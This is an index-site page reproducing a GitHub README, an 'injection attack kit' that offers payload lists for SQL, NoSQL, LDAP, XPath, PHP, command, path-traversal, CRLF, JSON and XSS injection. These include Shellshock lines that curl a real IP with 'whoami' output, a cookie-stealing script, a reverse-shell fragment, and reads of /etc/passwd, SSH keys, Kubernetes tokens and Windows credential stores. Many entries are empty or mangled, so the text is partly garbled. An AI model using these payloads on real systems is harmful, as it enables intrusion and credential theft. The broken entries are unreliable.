Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.
Awesome Lists | Featured Topics | Projects
https://github.com/byt3n33dl3/offensivequeries

Blind Sniper Injection Attack Kit.
https://github.com/byt3n33dl3/offensivequeries
blindsqli injection nosql offensive-security parameters sql-injection
Last synced: 7 days ago
JSON representation
Blind Sniper Injection Attack Kit.
Host: GitHub
URL: https://github.com/byt3n33dl3/offensivequeries
Owner: byt3n33dl3
License: mit
Created: 2024-05-25T14:29:25.000Z (7 months ago)
Default Branch: main
Last Pushed: 2024-05-26T12:13:37.000Z (7 months ago)
Last Synced: 2024-12-14T22:18:34.842Z (11 days ago)
Topics: blindsqli, injection, nosql, offensive-security, parameters, sql-injection
Homepage:
Size: 18.6 KB
Stars: 11
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project

README

        Injections Attack example, by: [pxcs](https://github.com/pxcs/)



> []() A common attack vector that uses malicious query code for backend database manipulation, to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data.



### List of query injection: 

| 💉 HTML Injections |

| ---- |

| `````` |

| `````` |

| ```HTML``` |

| `````` |

| `````` |

| ```Sorry, your browser does not support Html``` |

| ``` 32% ``` |

| ```draw htmli``` |

| `````` |

| ``` ``` |

| ```html``` |

| ```2 out of 10``` |

| ```%253Ci%253Ehtml%253C%252Fi%253E``` |

| `````` |

| ```
html
``` |

| 💉 HTML Injection Read File |

| ---- |

| ```/home/$USER/.bash_history``` |

| ```%2Fetc%2Fpasswd%2500``` |

| ```....//....//....//....//....//....//....//etc/passwd%00``` |

| ```%2Fetc%2Fknockd.conf``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmotd``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmysql%2Fmy.cnf``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.ssh%2Fid_rsa``` |

| ```/run/secrets/kubernetes.io/serviceaccount/token``` |

| ``..%2F..%2F..%2F..%2F..%2F..%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken`` |

| ```/var/lib/mlocate/mlocate.db``` |

| ```..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate.db``` |

| ```../../../../../../proc/net/arp``` |




| 💉 SQL Injections |

| ---- |

| ```0' or '0' = '0``` |

| ```1' or '1' = '1``` |

| ```' or ''-'``` |

| ```or true--``` |

| ```')) or (('x'))=(('x``` |

| ```")) or (("x"))=(("x``` |

| ```' OORR 1<2 #``` |

| ```admin' or '1'='1'--``` |

| ```admin' or '1'='1'#``` |

| ```admin') or ('1'='1``` |

| ```' or 'one'='one``` |

| ```' or uname like '%``` |

| ```") or ("1"="1"--``` |

| ```' or 1=1 LIMIT 1;#``` |

| ```') or ('a'='a and hi") or ("a"="a``` |

| ```123 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055``` |

| ```ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))``` |

| ```ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6``` |

| ```ORDER BY 1,SLEEP(5),3,4#``` |

| ```UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14``` |

| ```UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--``` |

| ```AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#``` |

| ```AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))``` |

| ```UNION ALL SELECT 'INJ''ECT''XXX',2,3,4``` |

| ```%2b(select*from(select(sleep(2)))a)%2b``` |

| ```admin') or '1'='1'/*``` |

| ```admin') or ('1'='1'--``` |

| ```benchmark(50000000,MD5(1))--``` |

| ```or benchmark(50000000,MD5(1))--``` |

| ```")) or sleep(5)="``` |

| ```http://domain.com/index.php?id=1' order by 1))--``` |

| ```http://domain.com/index.php?id=1' order by 1));%00``` |

| ```http://domain.com/index.php?id=1' order by 1%60``` |

| ```http://domain.com/index.php?id=1' order by 1") ;%00``` |

| ```%23foo*%2F*bar%0D%0A``` |

| ```http://domain.com/index.php?id=1'/**/order/**/by/**/1--/**/-``` |

| ```database%23%0A(%23%0A)``` |

| 💉 NoSQL Injections |

| ---- |

| ```username[$ne]=toto&password[$ne]=toto``` |

| ```login[$gt]=admin&login[$lt]=test&pass[$ne]=1``` |

| ```login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto``` |

| ```{ "username": { "$ne": null }, "password": { "$ne": null } }``` |

| ```{ "username": "admin' OR '1'='1", "password": "password" }``` |

| ```EVAL "return redis.call('info')" 0``` |

| ```FOR user IN users FILTER user.username == 'admin' 1 == 1 RETURN user``` |

| ```{ "username": "admin", "password": { "$where": "this.password.length > 0" } }``` |

| ```username[$ne]=toto&password[$regex]=md.{1}``` |

| ```";return 'a'=='a' && ''=='``` |




| 💉 PHP Injections |

| ---- |

| ```&&id``` |

| ```;system('id')``` |

| ```system('cat /etc/passwd');``` |

| ```shell exec("id")``` |

| ```exec("ping -c 4 192.168.1.6")``` |

| ```PASSTHRU("id")``` |

| ```phpinfo();system('cat /etc/passwd')``` |

| ```print_r($_POST);system('id')``` |

| ```pcntl_exec("/usr/bin/uptime")``` |

| ```file get contents ("/etc/passwd")``` |

| ```$file = fopen ("testl.txt", "w"); echo fwrite($file, "Hello World. Testing!"); fclose($file)``` |

| ```$file = fopen ("phpinfo-1.php", "W"); echo fwrite ($file, ""); fclose ($file)``` |

| ```$file = fopen(".php", "w"); echo ($file, "php -r '$sock='' ('' ,) ;' /bin/sh -i <83 >83 2-83' ;"); fclose($)``` |

| ```passthru('id')``` |

| ```echo%20file_exists("index.html");``` |

| ```ECHO%20FILE_EXISTS("/etc/passwd");``` |

| ```echo%20copy("/etc/passwd","/tmp/passwd");``` |

| ```echo%20file_get_contents("/etc/passwd");``` |

| ```echo%20file_put_contents("index.html","Hello%20World.%20Testing!");``` |

| ```ECHO%20FILE_PUT_CONTENTS("index.html","HELLO%20WORLD.%20TESTING!");``` |




| 💉 LDAP Injections |

| ---- |

| ```(uid=*)(userPassword=*)``` |

| ```(uid=admin)((uid=*)(userPassword=*))``` |

| ```(uid=*admin*)``` |

| ```(&(uid=admin)(!(userPassword=*)))``` |

| ```(&(uid=admin)(userPassword=pa*))``` |

| ```((uid=admin)(uid=*))``` |

| ```*)(uid=*))((uid=*``` |

| ```(&(uid=admin)((userPassword=wrongpassword)(userPassword=*)))``` |

| ```(uid=*)(userPassword=*)(cn=admin)``` |

| ```(&(uid=admin)(objectClass=*))((uid=*)(objectClass=inetOrgPerson))``` |

| ```String filter = "(&(uid=" + username + ")(userPassword=" + password + "))";``` |

| ```(&(uid=admin)(&)(userPassword=anyPassword))``` |

| ```(&(uid=admin)(userPassword=*)(uid=*)``` |

| ```(&(uid=admin)(userPasswordDomain=*)(uid=*)``` |

| ```admin)(&``` |

| ```(*)(&``` |

| ```*)(&``` |




| 💉 XPath Injections |

| ---- |

| ```' or true() or '``` |

| ```' or '1'='1``` |

| ```' or name()='username' or '``` |

| ```' or 'a'='a``` |

| ```' or 1=1 or '1'='1``` |

| ```' or count(/*)=1 or '``` |

| ```' or //user/*='admin' or '``` |

| ```' or 'x'='x') or ('y'='y``` |

| ```' or 1=1 or '1'='1'/* ``` |

| ```String xpathQuery = "//user[username/text()='" + username + "' and password/text()='" + password + "']";``` |

| ```//user[username/text()='' or '1'='1' and password/text()='password']``` |

| ```//user[username/text()='username' and password/text()='' or '1'='1']``` |




| 💉 Command Injection Unix |

| ---- |

| ```<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->``` |

| ```<!--#exec%20cmd="/usr/bin/id;-->``` |

| ```<!--#exec%20cmd="/usr/bin/id;-->``` |

| ```() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"``` |

| ```() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"``` |

| ```() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"``` |

| ```() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"``` |

| ```() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"``` |

| ```{{ get_user_file("/etc/passwd") }}``` |

| ```() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"``` |

| ```ca$@t /etc/passwd``` |

| ```cat $(xxd -r -ps <(echo 2f6574632f706173737764))``` |

| 💉 Command Injection Windows |

| ---- |

| ```C:\Users\{username}\AppData\Local\FileZilla``` |

| ```C:\Users\{username}\AppData\Local\Google\Chrome\User Data\Default\Login Data``` |

| ```C:\Users\{username}\AppData\Roaming\FileZilla\logs``` |

| ```C:\Users\{username}\AppData\Roaming\Microsoft\Credentials``` |

| ```C:\Windows\System32\drivers\etc\hosts``` |

| ```C:\Windows\System32\LogFiles\W3SVC1``` |




| 💉 XPath Injections |

| ---- |

| ```' or name()='username' or '``` |

| ```' or 1=1 or '1'='1``` |

| ```' or 1=1 or '1'='1'/*``` |

| ```//user[username/text()='username' and password/text()='' or '1'='1']``` |




| 💉 Java Script Injections |

| ---- |

| ```alert('Injected!');``` |

| ```document.location='http.com/steal?cookie=' + .cookie;``` |

| ```window.location='http://malicious.com';``` |

| ```document.body.innerHTML = '<h1>Hacked!</h1>';``` |

| ```while(true){}``` |

| `````` |

| ```
Welcome, 

``` |

| ```document.getElementById('user').innerHTML = getQueryParameter('user');``` |

| ```http://example.com?username=alert('Injected!');``` |

| 💉 JSON Injections |

| ---- |

| ```{ "username": "admin", "password": { "$ne": null } }``` |

| ```{ "username": "user", "password": "password", "admin": true }``` |

| ```{ "username": "user", "password": "password", "password": "malicious" }``` |

| ```{ "username": "user", "bio": "alert('Injected!');" }``` |

| ```{ "username": "user", "password": { "$gt": "" } }``` |

| ```{ "user": { "name": "admin", "role": "user" }, "user": { "role": "admin" } }``` |

| ```{ "username": "user", "callback": "require('child_process').exec('ls')" }``` |

| ```{ "username": "user", "password": "' OR '1'='1" }``` |

| ```{"username": "admin","password": "' OR '1'='1"}``` |




| 💉 XML Injections |

| ---- |

| ```admin' or '1'='1``` |

| ```admintrue``` |

| `````` |

| ```admin' or '1'='1password``` |

| ```userpassword``` |




| 💉 Directory Traversal Injections |

| ---- |

| ```/admin/(S(X))/main.aspx``` |

| ```/admin/Foobar/(S(X))/../(S(X))/main.aspx``` |

| ```/(S(X))/admin/(S(X))/main.aspx``` |

| ```/var/log/nginx/error.log``` |

| ```../../../../../../../../../etc/passwd``` |

| ```/../../../../../../../../../../../etc/passwd%00.jpg``` |

| ```/proc/self/cwd/index.php``` |

| ```/ = %c0%af, %e0%80%af, %c0%2f``` |

| ```%uff0e%uff0e%u2216``` |




| 💉 CRLF Injections |

| ---- |

| ```/%%0a0aSet-Cookie:crlf=injection``` |

| ```/%0aSet-Cookie:crlf=injection``` |

| ```/%0d%0aSet-Cookie:crlf=injection``` |

| ```/%0dSet-Cookie:crlf=injection``` |

| ```/%23%0aSet-Cookie:crlf=injection``` |

| ```/%23%0d%0aSet-Cookie:crlf=injection``` |

| ```/%23%0dSet-Cookie:crlf=injection``` |

| ```/%25%30%61Set-Cookie:crlf=injection``` |

| ```/%25%30aSet-Cookie:crlf=injection``` |

| ```/%250aSet-Cookie:crlf=injection``` |

| ```/%25250aSet-Cookie:crlf=injection``` |

| ```/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection``` |

| ```/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection``` |

| ```/%2F..%0d%0aSet-Cookie:crlf=injection``` |

| ```/%3f%0d%0aSet-Cookie:crlf=injection``` |

| ```/%u000aSet-Cookie:crlf=injection``` |




| 💉 XSS Attacks |

| ---- |

| ```"-prompt(8)-"``` |

| ```'-eval("window['pro'%2B'mpt'](8)")-'``` |

| ```"onclick=prompt(8)>"@x.y``` |

| ```"onclick=prompt(8)>"@x.y``` |

| `````` |

| `````` |

| `````` |

| ```t>``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```javascript:alert(1);``` |

| ```'`"><\x3Cscript>javascript:alert(1)``` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| `````` |

| ```